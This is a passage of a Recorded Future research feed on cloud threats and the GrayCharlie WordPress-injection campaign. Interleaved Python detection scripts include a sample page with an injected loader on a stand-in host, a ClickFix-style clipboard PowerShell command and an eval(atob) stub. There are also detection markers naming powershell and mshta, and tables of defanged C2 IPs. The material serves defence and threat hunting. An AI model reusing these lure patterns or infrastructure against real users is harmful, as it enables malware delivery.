        <p>Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.</p>
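<p>Two of the post-compromise behaviours above, destroying cloud backups and snapshots for impact and exfiltrating data through native storage services, leave management-plane records that can be hunted without any agent. The following is an added example, not Recorded Future’s code or detection content: it runs over constructed CloudTrail records and flags an EBS snapshot shared to a foreign account (a native, tooling-free way to copy data out) and any principal whose backup or snapshot deletions cluster inside a short window. The eventSource and eventName values are real AWS API names; the burst threshold, the window, the account IDs and the records themselves are assumptions.</p>

```python
"""Hunt CloudTrail for backup destruction and snapshot sharing.

Added example, not Recorded Future's code. The event records below are
constructed; the eventSource/eventName values are real AWS API names, while
the burst threshold, the window and the account IDs are assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Management-plane calls that remove recovery capability, grouped by service
# so an unrelated service using the same verb is not matched by accident.
DESTRUCTIVE = {
    "ec2.amazonaws.com": {"DeleteSnapshot"},
    "rds.amazonaws.com": {"DeleteDBSnapshot", "DeleteDBClusterSnapshot"},
    "backup.amazonaws.com": {"DeleteBackupVault", "DeleteRecoveryPoint",
                             "DeleteBackupPlan"},
}


def parse_trail(text):
    """Parse newline-delimited CloudTrail records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _when(ev):
    return datetime.fromisoformat(ev["eventTime"].replace("Z", "+00:00"))


def external_share_targets(ev, own_account):
    """Accounts or groups an EBS snapshot was shared with outside own_account.

    ModifySnapshotAttribute with createVolumePermission.add copies data out of
    a tenant without touching S3 or any exfiltration tooling.
    """
    if ev.get("eventName") != "ModifySnapshotAttribute":
        return []
    perm = ev.get("requestParameters", {}).get("createVolumePermission", {})
    targets = []
    for item in perm.get("add", {}).get("items", []):
        if item.get("group"):  # group "all" makes the snapshot public
            targets.append("group:" + item["group"])
        elif item.get("userId") and item["userId"] != own_account:
            targets.append("account:" + item["userId"])
    return targets


def hunt(events, own_account, window=timedelta(minutes=10), burst=3):
    """Return (actor, description) pairs for sharing and burst-deletion findings."""
    findings = []
    deletions = defaultdict(list)
    for ev in events:
        actor = ev.get("userIdentity", {}).get("arn", "unknown")
        if ev.get("eventName") in DESTRUCTIVE.get(ev.get("eventSource"), ()):
            deletions[actor].append(_when(ev))
        for target in external_share_targets(ev, own_account):
            snap = ev.get("requestParameters", {}).get("snapshotId", "?")
            findings.append((actor, f"snapshot {snap} shared with {target}"))
    # One deletion is routine hygiene; several within minutes by one principal
    # is the pattern that precedes a ransom demand.
    for actor, times in deletions.items():
        times.sort()
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= burst:
                findings.append((actor, f"{count} backup/snapshot deletions within {window}"))
                break
    return findings


# Constructed records (not real telemetry); account IDs are placeholders.
OWN_ACCOUNT = "111122223333"
SAMPLE_TRAIL = """
{"eventTime":"2026-02-03T02:10:00Z","eventSource":"ec2.amazonaws.com","eventName":"DeleteSnapshot","userIdentity":{"arn":"arn:aws:iam::111122223333:user/ops-sync"},"requestParameters":{"snapshotId":"snap-0a1"}}
{"eventTime":"2026-02-03T02:11:30Z","eventSource":"ec2.amazonaws.com","eventName":"DeleteSnapshot","userIdentity":{"arn":"arn:aws:iam::111122223333:user/ops-sync"},"requestParameters":{"snapshotId":"snap-0a2"}}
{"eventTime":"2026-02-03T02:13:00Z","eventSource":"backup.amazonaws.com","eventName":"DeleteBackupVault","userIdentity":{"arn":"arn:aws:iam::111122223333:user/ops-sync"},"requestParameters":{"backupVaultName":"prod-vault"}}
{"eventTime":"2026-02-03T02:14:10Z","eventSource":"rds.amazonaws.com","eventName":"DeleteDBSnapshot","userIdentity":{"arn":"arn:aws:iam::111122223333:user/ops-sync"},"requestParameters":{"dBSnapshotIdentifier":"prod-db-20260201"}}
{"eventTime":"2026-02-03T02:20:00Z","eventSource":"ec2.amazonaws.com","eventName":"ModifySnapshotAttribute","userIdentity":{"arn":"arn:aws:iam::111122223333:user/ops-sync"},"requestParameters":{"snapshotId":"snap-0b9","attributeType":"CREATE_VOLUME_PERMISSION","createVolumePermission":{"add":{"items":[{"userId":"999988887777"}]}}}}
{"eventTime":"2026-02-03T09:00:00Z","eventSource":"ec2.amazonaws.com","eventName":"DeleteSnapshot","userIdentity":{"arn":"arn:aws:iam::111122223333:role/nightly-cleanup"},"requestParameters":{"snapshotId":"snap-0c3"}}
"""


def run_sample():
    """Run the hunt over the constructed trail."""
    return hunt(parse_trail(SAMPLE_TRAIL), OWN_ACCOUNT)


if __name__ == "__main__":
    for actor, what in run_sample():
        print(f"{actor}: {what}")
```

<p>The nightly-cleanup role’s single deletion is deliberately not flagged; the value of the window is that it separates scheduled hygiene from a principal working through every recovery point before deploying ransomware. In a real tenant the same logic belongs in the SIEM rule that also watches for the directory-synchronized and non-human identities the report describes being used for this activity.</p>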
        <p>In comparison to its previous <a href="https://www.recordedfuture.com/ko/research/cloud-threat-hunting-defense-landscape">iteration</a>, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:</p>
        <ul>
          <li>Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.</li>
<li>DDoS attacks are becoming less effective against cloud environments, even at record-breaking throughput, because cloud-native mitigation capabilities have improved.</li>
          <li>Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.</li>
        </ul>
        <p>The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.</p>
        <p><strong><a href="https://assets.recordedfuture.com/Executive-Insights/CTA-20260219_Cloud_Threat_Landscape_Exec_Report.pdf">Download Cloud Threat Landscape: Executive Insights</a></strong></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1dd2d1174c3e28d579004a1fe4f44c24107a72547.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayCharlie Hijacks Law Firm Sites in Suspected Supply-Chain Attack]]></title>
            <link>https://www.recordedfuture.com/ko/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.</p>
        <p>To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section of this report for implementation guidance and <strong>Appendix A</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.</li>
          <li>Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.</li>
          <li>Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.</li>
        </ul>
        <h2>Background</h2>
        <p>GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.</p>
        <p>In late March or early April 2025, SmartApeSG <a href="https://www.malware-traffic-analysis.net/2025/06/18/index.html">shifted</a> from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.</p>
        <p>GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.</p>
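<p>The injection pattern described in this Background, a reference to externally hosted JavaScript planted in a compromised WordPress page that then serves a fake-update or ClickFix lure, can be triaged offline from the page source: list every script the page loads from a host the site has no business loading from, and look in inline scripts for a clipboard write that plants a command, or for an eval over a long encoded blob. The following is an added example, not Recorded Future’s code or detection rules; the sample page, the site host, the injected host and the trusted CDN list are constructed, and the markers are general heuristics rather than GrayCharlie indicators.</p>

```python
"""Triage a WordPress page for injected external scripts and lure code.

Added example, not Recorded Future's code or detection content. The sample
page, the site host, the injected host and the trusted CDN list are
constructed; the markers are general heuristics, not GrayCharlie indicators.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Third-party script hosts this site is expected to load (assumed).
TRUSTED_SCRIPT_HOSTS = {"ajax.googleapis.com", "cdnjs.cloudflare.com"}

# Strings typical of ClickFix lures: a clipboard write that plants a command,
# and the Windows binaries such commands usually invoke. Compared lowercase.
LURE_MARKERS = ("navigator.clipboard.writetext", "powershell", "mshta", "cmd /c")

# A long run of base64 characters: the usual shape of an obfuscated stage.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def triage(html, site_host):
    """Return (kind, detail) findings for one page of the given site."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:
            continue  # relative path, same origin as the page
        host = host.lower()
        if host != site_host and not host.endswith("." + site_host) \
                and host not in TRUSTED_SCRIPT_HOSTS:
            findings.append(("external-script", src))
    for body in parser.inline:
        low = body.lower()
        hits = [m for m in LURE_MARKERS if m in low]
        if hits:
            findings.append(("clickfix-markers", ",".join(hits)))
        if ("atob(" in low or "eval(" in low) and B64_BLOB.search(body):
            findings.append(("obfuscated-inline", body[:40]))
    return findings


# Constructed sample page; hosts use reserved example domains.
SITE_HOST = "lawfirm.example"
SAMPLE_PAGE = (
    '<html><head>'
    '<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>'
    '<script src="/wp-includes/js/wp-embed.min.js"></script>'
    '<script>window.dataLayer = window.dataLayer || [];</script>'
    # Injected loader on a host the site has never used.
    '<script src="https://assets.example.net/js/stat.js"></script>'
    '</head><body>'
    # ClickFix-style lure planting a command on the clipboard.
    '<script>navigator.clipboard.writeText("powershell -w hidden -c ...");</script>'
    # Obfuscated inline stage: eval over a long base64 blob.
    '<script>eval(atob("' + "QUJD" * 30 + '"));</script>'
    '</body></html>'
)


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_PAGE, SITE_HOST):
        print(f"{kind:<18} {detail}")
```

<p>Across a fleet of sites that share one IT provider, the useful output is the set of external script hosts that appear on many sites at once and on none of them before a given date; that is the view that would surface the cluster of law firm sites described in this report. The inline heuristics are only a triage aid and will need tuning against the plugins a given site legitimately runs.</p>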
        <h2>Threat Analysis</h2>
        <p>Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.</p>
        <h3>Infrastructure Analysis</h3>
        <h4>NetSupport RAT Clusters</h4>
        <p>Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see <strong>Figure 1</strong>). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_14fd6cf6079b29690c9ef99e5ec9308e54ce5364d.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h5>Cluster 1</h5>
        <p>Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key <code>DCVTTTUUEEW23</code> and serial number <code>NSM896597</code>, before shifting to the license key <code>EVALUSION</code> and serial number <code>NSM165348</code> in subsequent deployments. The C2 servers associated with this cluster are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>194[.]180[.]191[.]51</div>
            <div>mar5</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]168</div>
            <div>mar4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]171</div>
            <div>mar3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]60</div>
            <div>mar1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]17</div>
            <div>mar2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]66</div>
            <div>apr2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]81</div>
            <div>apr3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>185[.]225[.]17[.]74</div>
            <div>apr4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]189</div>
            <div>apr1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]123</div>
            <div>may5</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]104</div>
            <div>may1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]115</div>
            <div>may2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]118</div>
            <div>may3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]131</div>
            <div>may4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]137</div>
            <div>may53</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]13</div>
            <div>june2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]174</div>
            <div>june6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]140</div>
            <div>june1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]30</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]63</div>
            <div>june3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]111</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]135</div>
            <div>june5ebatquot</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]23</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]41</div>
            <div>july1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]61</div>
            <div>july3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]73</div>
            <div>july4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]87</div>
            <div>july6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]97</div>
            <div>july8</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]130</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)</em></p>
        <p>Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name <code>june5ebatquot</code> associated with IP address <em>94[.]158[.]245[.]135</em> was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name <code>june6</code> linked to <em>94[.]158[.]245[.]174</em> was created only 20 seconds later.</p>
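        <p>The pivot described above (same common-name family plus certificates issued seconds apart) can be automated for any certificate export. The following is an added example written for this post, not Insikt Group's tooling; only the <code>june5ebatquot</code>/<code>june6</code> timestamps come from the report, and every other record, the 60-second window and the naming regexes are assumptions chosen to mirror the two clusters.</p>

```python
"""Cluster TLS certificates by CN naming family and near-simultaneous creation.

Added example, not Insikt Group's tooling. Only the june5ebatquot/june6
timestamps come from the report; every other record below is constructed.
"""
import re
from datetime import datetime, timedelta

# (defanged IP, TLS common name, certificate notBefore). Constructed sample set.
SAMPLE_CERTS = [
    ("94[.]158[.]245[.]135", "june5ebatquot", "2025-06-30T16:55:20"),  # from the report
    ("94[.]158[.]245[.]174", "june6", "2025-06-30T16:55:40"),          # from the report
    ("94[.]158[.]245[.]140", "june1", "2025-06-30T16:55:03"),          # constructed
    ("5[.]181[.]159[.]112", "sssi3", "2025-06-17T09:12:00"),           # constructed
    ("5[.]181[.]159[.]9", "ssi1", "2025-06-17T09:12:05"),              # constructed
    ("203[.]0[.]113[.]10", "www.example.test", "2025-06-30T16:56:00"), # constructed, unrelated
]

# Cluster 1 style: month abbreviation followed by a number (mar5, apr1, june6, ...).
MONTH_CN = re.compile(r"^(jan|feb|mar|apr|may|june?|july?|aug|sep|oct|nov|dec)\d+", re.I)
# Cluster 2 style: two or more "s", then "i" and a number (sssi3, ssi1, ...).
SSI_CN = re.compile(r"^s{2,}i\d+$", re.I)


def cn_family(cn):
    """Return the naming family a common name belongs to, or None."""
    if MONTH_CN.match(cn):
        return "month-numbered"
    if SSI_CN.match(cn):
        return "s-i-numbered"
    return None


def cluster_by_creation(certs, window=timedelta(seconds=60)):
    """Group certs of the same CN family whose creation times chain together
    with gaps no larger than `window`. Returns a list of cluster dicts."""
    parsed = []
    for ip, cn, not_before in certs:
        family = cn_family(cn)
        if family:
            parsed.append((datetime.fromisoformat(not_before), family, ip, cn))
    parsed.sort()
    clusters = []
    for ts, family, ip, cn in parsed:
        for c in clusters:
            if c["family"] == family and ts - c["last"] <= window:
                c["members"].append((ip, cn))
                c["last"] = ts
                break
        else:
            clusters.append({"family": family, "first": ts, "last": ts, "members": [(ip, cn)]})
    return clusters


if __name__ == "__main__":
    for c in cluster_by_creation(SAMPLE_CERTS):
        print(c["family"], c["first"], "->", c["last"], [cn for _, cn in c["members"]])
```

        <p>Run against the constructed set, the three June certificates chain into one month-numbered cluster and the two <code>s…i</code> certificates into a second, while the unrelated <code>www.example.test</code> certificate issued a minute later is never considered because its name fits neither family. The naming filter is what keeps a burst of unrelated certificates from a busy hosting provider from being merged in on timing alone.</p>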
        <h5>Cluster 2</h5>
        <p>Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificate common names typically start with two or more repetitions of “s”, followed by an “i” and a number (“<code>sssi3</code>”, for example). NetSupport RAT samples linked to Cluster 2 used the license key <code>XMLCTL</code> and serial number <code>NSM303008</code>. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in <strong>Table 2</strong>. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]112</div>
            <div>sssi3</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]9</div>
            <div>ssi1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]38</div>
            <div>sssi2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]140</div>
            <div>ssssi6</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]143</div>
            <div>ssssi8</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]142</div>
            <div>sssssi7</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]139</div>
            <div>ssssi5</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 2:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)</em></p>
        <p>Of note, one NetSupport RAT C2 server (<em>94[.]158[.]245[.]56</em>) used a TLS certificate with the common name <code>23sss</code>, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (<code>EVALUSION</code>) and serial number (<code>NSM165348</code>) previously observed in Cluster 1.</p>
        <h5>Other NetSupport RAT C2 Servers</h5>
        <p>Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see <strong>Table 3</strong>). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]29</div>
            <div>ssdecservicsdes</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]18</div>
            <div>papichssd2</div>
            <div>DCVTTTUUEEW2</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]153</div>
            <div>kosmo2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]170</div>
            <div>normvork</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]62</div>
            <div>ffdds</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]234</div>
            <div>wedn1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]35</div>
            <div>scgs234123</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]209</div>
            <div>novemsdf</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]244</div>
            <div>wends4</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]121</div>
            <div>novaksuur</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]120</div>
            <div>lohsd</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]15</div>
            <div>bounce</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]16</div>
            <div>update1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 3:</strong></em> <em>Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)</em></p>
        <h4>Staging Infrastructure</h4>
        <p>Once a GrayCharlie victim lands on a compromised WordPress site and satisfies the conditional checks in the injected script, the next-stage payload is typically fetched from actor-controlled infrastructure and injected into the compromised page. Insikt Group has identified two distinct types of staging infrastructure, each characterized by a different website template: Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”</p>
        <h5>Type 1: “Wiser University”</h5>
        <p>The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see <strong>Figure 2</strong>), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education <a href="https://themewagon.com/themes/free-bootstrap-4-html5-education-website-template-wiser/">website template</a> for school, college, and university websites. (As a sidenote, Oreshnik, the name in the WHOIS email address <em>oreshnik[@]mailum[.]com</em> discussed under Type 2 below, is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) <strong>Appendix B</strong> lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1500e0d2021b91244c59d04e70097054a1c748693.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Website impersonating “Wiser University” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h6>Suspected Testing Infrastructure</h6>
        <p>Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in <strong>Appendix B</strong>, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see <strong>Table 4</strong>). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>Date of Emergence</strong></div>
          </div>
          <div>
            <div>89[.]253[.]222[.]25</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-29</div>
          </div>
          <div>
            <div>89[.]253[.]222[.]156</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-26</div>
          </div>
          <div>
            <div>89[.]169[.]12[.]48</div>
            <div>AS207957</div>
            <div>GB</div>
            <div>2025-07-08</div>
          </div>
          <div>
            <div>185[.]231[.]245[.]158</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-06-27</div>
          </div>
          <div>
            <div>95[.]182[.]123[.]86</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-05-19</div>
          </div>
          <div>
            <div>23[.]140[.]40[.]66</div>
            <div>AS61400</div>
            <div>RU</div>
            <div>2025-04-11</div>
          </div>
          <div>
            <div>217[.]114[.]15[.]253</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-04-09</div>
          </div>
          <div>
            <div>45[.]153[.]191[.]245</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-03-21</div>
          </div>
          <div>
            <div>46[.]29[.]163[.]28</div>
            <div>AS51659</div>
            <div>RU</div>
